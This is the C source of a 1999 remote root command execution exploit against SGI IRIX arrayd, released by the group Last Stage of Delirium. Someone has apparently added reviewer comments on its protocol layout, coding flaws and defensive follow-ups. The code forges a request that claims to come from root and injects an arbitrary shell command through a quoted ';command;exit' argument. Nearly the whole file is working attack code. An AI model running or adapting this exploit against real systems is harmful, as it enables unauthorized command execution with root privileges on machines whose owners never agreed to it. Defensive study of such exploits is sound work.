C/C++ Source or Header  |  2002-10-22  |  4.5 KB  |  130 lines

  1. /*## copyright LAST STAGE OF DELIRIUM aug 1999 poland        *://lsd-pl.net/ #*/
  2. /*## arrayd                                                                  #*/
  3.  
  4. /*   this code does the same as the following command invoked with root user  */
  5. /*   privileges:                                                              */
  6. /*   /usr/sbin/array -s address launch pvm xxx xxx xxx "\";command;exit\""    */
  7. /*   there are two possible authentication methods that can be used by        */
  8. /*   the arrayd service:                                                      */
  9. /*   AUTHENTICATION NONE                                                      */
  10. /*       requests from anywhere are accepted                                  */
  11. /*   AUTHENTICATION SIMPLE                                                    */
  12. /*       requests from trusted hosts are accepted if they match the host/key  */
  13. /*       from arrayd.auth file. if there is not a specific host/key pair for  */
  14. /*       a given machine the request is also accepted although it should not  */
  15. /*       be (see the manual pages in case you don't believe it).              */
  16. /*       as you see, SGI's suggestion to protect an arrayd cluster by         */
  17. /*       enabling simple authentication has no effect                         */
  18.  
  19. #include <sys/types.h>
  20. #include <sys/socket.h>
  21. #include <netinet/in.h>
  22. #include <netdb.h>
  23. #include <stdio.h>
  24. #include <errno.h>
  25.  
  /*
   * msg1: fixed 64-byte header that main sends first on the connection
   * (main writes exactly 64 bytes of it).
   *
   * Bytes 12..15 hold the placeholder 0x12,0x34,0x56,0x78; main overwrites
   * them with the length of the second message, in network byte order,
   * before sending. Every other byte goes out exactly as listed here.
   *
   * NOTE(review): the leading 8 bytes look like a protocol magic/version
   * value. Presumably the same prefix appears in legitimate array client
   * traffic, so it is not by itself an indicator of abuse; confirm against
   * captured traffic before relying on it for detection.
   */
  26. char msg1[]={
  27.     0x31,0x08,0x12,0x63,0x13,0x54,0x34,0x23,
  28.     0x00,0x00,0x00,0x00,0x12,0x34,0x56,0x78,
  29.     0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x03,
  30.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  31.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
  32.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  33.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  34.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  35. };
  36.  
  /*
   * msg2: template for the request body. main copies it into a local buffer
   * and appends the quoted command string directly after it before sending.
   *
   * Layout, using the original author's labels: a 12-byte prefix, three
   * entries labelled array / args / creds, the credentials section
   * (origin, user, group, project) and the argument section.
   * NOTE(review): the 4-byte pairs look like (offset, length) descriptors;
   * that reading is an assumption, not something this file states.
   *
   * Security-relevant point for defenders: the user and group fields are the
   * literal strings "root", supplied by the client inside the request. Nothing
   * in this message is a secret or a proof of identity. Per the file header,
   * arrayd accepts such a request under AUTHENTICATION NONE, and under
   * AUTHENTICATION SIMPLE whenever no host/key pair exists for the sender.
   *
   * NOTE(review): the 0x12,0x34,0x56,0x78 values in this array are sent as
   * listed; main only patches the placeholder in msg1.
   */
  37. char msg2[]={
  38.     0x00,0x00,0x00,0x02,0x10,0x00,0x28,0x00,
  39.     0x00,0x00,0x00,0x0f,
  40.  
  41.     0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* array   */
  42.     0x00,0x00,0x00,0x5c,0x12,0x34,0x56,0x78,   /* args    */
  43.     0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x38,   /* creds   */
  44.  
  45.     /* creds */
  46.     0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* origin  */
  47.     0x00,0x00,0x00,0x28,0x00,0x00,0x00,0x05,   /* user    */
  48.     0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x05,   /* group   */
  49.     0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* project */
  50.     0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
  51.  
          /* client-asserted user name and group name, each padded to 8 bytes */
  52.     'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
  53.     'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
  54.  
  55.     /* args */
  56.     0x00,0x00,0x00,0x06,
  57.     0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x30,
  58.  
  59.     0x00,0x00,0x00,0x3c,0x00,0x00,0x00,0x07,
  60.     0x00,0x00,0x00,0x44,0x00,0x00,0x00,0x04,
  61.     0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x04,
  62.     0x00,0x00,0x00,0x4c,0x00,0x00,0x00,0x04,
  63.     0x00,0x00,0x00,0x50,0x00,0x00,0x00,0x03,
  64.     0x00,0x00,0x00,0x54,0x12,0x34,0x56,0x78,
  65.  
          /* argument strings: these match the "launch pvm xxx xxx xxx" words of
           * the command line quoted in the file header; "xxx" is filler */
  66.     'l' ,'a' ,'u' ,'n' ,'c' ,'h' ,0x00,0x00,
  67.     'p' ,'v' ,'m' ,0x00,'x' ,'x' ,'x' ,0x00,
  68.     'x' ,'x' ,'x' ,0x00,'x' ,'x' ,'x' ,0x00,
  69. };
  70.  
  /*
   * Proof-of-concept client for the arrayd request described in the file
   * header. Usage, from the usage string: <prog> address [-c command];
   * the command defaults to "id".
   *
   * Flow: connect to TCP port 5434 on the given address, append the quoted
   * command to a copy of msg2, patch the body length into msg1, send both
   * messages, then read the reply and check two status words.
   *
   * NOTE(review), code quality:
   *  - main has no declared return type, and exit/getopt/bzero/memcpy/strlen/
   *    inet_addr/read/write are used without their headers being included, so
   *    the file relies on implicit declarations.
   *  - the return values of socket(), write() and read() are never checked.
   *  - lengths are handled through unsigned long casts whose behaviour
   *    depends on the host's word size and byte order (see inline notes).
   *
   * NOTE(review), defensive reading: the request contains no secret, so the
   * only controls that matter are on the server side. The file header says
   * AUTHENTICATION SIMPLE still accepts hosts that have no host/key pair;
   * limiting which hosts can reach the arrayd port and checking the vendor's
   * guidance for the affected IRIX releases are the follow-ups to confirm.
   */
  71. main(int argc,char **argv){
  72.     char buffer[10000],len[4],*b,*cmd="id";
  73.     int i,c,sck;
  74.     struct sockaddr_in address;
  75.     struct hostent *hp;
  76.  
  77.     printf("copyright LAST STAGE OF DELIRIUM aug 1999 poland  //lsd-pl.net/\n");
  78.     printf("arrayd for irix 6.2 6.3 6.4 6.5 6.5.4 IP:all\n\n");
  79.  
  80.     if(argc<2){
  81.         printf("usage: %s address [-c command]\n",argv[0]);
  82.         exit(-1);
  83.     }
  84.  
          /* getopt is handed argc-1 and &argv[1], so the address in argv[1]
           * occupies the program-name slot and option parsing starts after it */
  85.     while((c=getopt(argc-1,&argv[1],"c:"))!=-1){
  86.         switch(c){
  87.         case 'c': cmd=optarg;break;
  88.         }
  89.     }
  90.  
          /* NOTE(review): socket() failure is not checked; it would only
           * surface later as a connect() error */
  91.     sck=socket(AF_INET,SOCK_STREAM,0);
  92.     bzero(&address,sizeof(address));
  93.  
  94.     address.sin_family=AF_INET;
          /* 5434/tcp is the port this listing uses for arrayd */
  95.     address.sin_port=htons(5434);
          /* try a dotted-quad literal first; on -1 fall back to a name lookup */
  96.     if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1){
  97.         if((hp=gethostbyname(argv[1]))==NULL){
  98.             errno=EADDRNOTAVAIL;perror("error");exit(-1);
  99.         }
              /* copies 4 bytes, i.e. an IPv4 address */
  100.         memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
  101.     }
  102.     if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
  103.         perror("error");exit(-1);
  104.     }
  105.  
          /* build the body: msg2 followed by the command wrapped in quote and
           * semicolon characters.
           * NOTE(review): sprintf is unbounded and cmd comes from the command
           * line; a -c argument longer than the space left in buffer overruns
           * this stack array. There is no length check anywhere. */
  106.     memcpy(buffer,msg2,sizeof(msg2));
  107.     sprintf(&buffer[sizeof(msg2)],"\";%s;exit\"",cmd);
  108.  
          /* body length = msg2 + command + 8 wrapper characters + terminating
           * NUL, converted to network byte order and copied into msg1[12..15].
           * NOTE(review): the store goes through an unsigned long pointer into
           * a 4-byte array; where unsigned long is wider than 4 bytes this
           * writes past len, and the 4 bytes copied below may then not hold the
           * htonl() result - TODO confirm against the intended target ABI. */
  109.     *(unsigned long*)len=htonl(sizeof(msg2)+strlen(cmd)+8+1);
  110.     b=&msg1[12];
  111.     for(i=0;i<4;i++) *b++=len[i];
  112.  
          /* send the 64-byte header, then the body; short writes go unnoticed */
  113.     write(sck,msg1,64);
  114.     write(sck,buffer,sizeof(msg2)+strlen(cmd)+8+1);
  115.  
          /* the first read takes up to 64 bytes of reply, which the second read
           * then overwrites from the start of buffer. Neither return value is
           * checked, so a short or failed read leaves the request bytes still
           * in buffer to be examined below. */
  116.     read(sck,buffer,64);
  117.     read(sck,buffer,sizeof(buffer));
  118.  
          /* status word at reply offset 8 must equal 1, otherwise the tool
           * reports "command refused".
           * NOTE(review): read through an unsigned long pointer with no ntohl(),
           * so the comparison depends on host byte order and on
           * sizeof(unsigned long). */
  119.     b=&buffer[8];
  120.     if((*(unsigned long*)b)!=1){
  121.         printf("error: command refused\n");exit(-1);
  122.     }
          /* word at reply offset 12 must be 1 or 2, otherwise the tool reports
           * "command not executed"; the same caveats apply to this read */
  123.     b=&buffer[12];
  124.     if(((*(unsigned long*)b)!=1)&&((*(unsigned long*)b)!=2)){
  125.         printf("error: command not executed\n");exit(-1);
  126.     }
  127.     printf("OK!\n");
  128. }
  129.  
  130.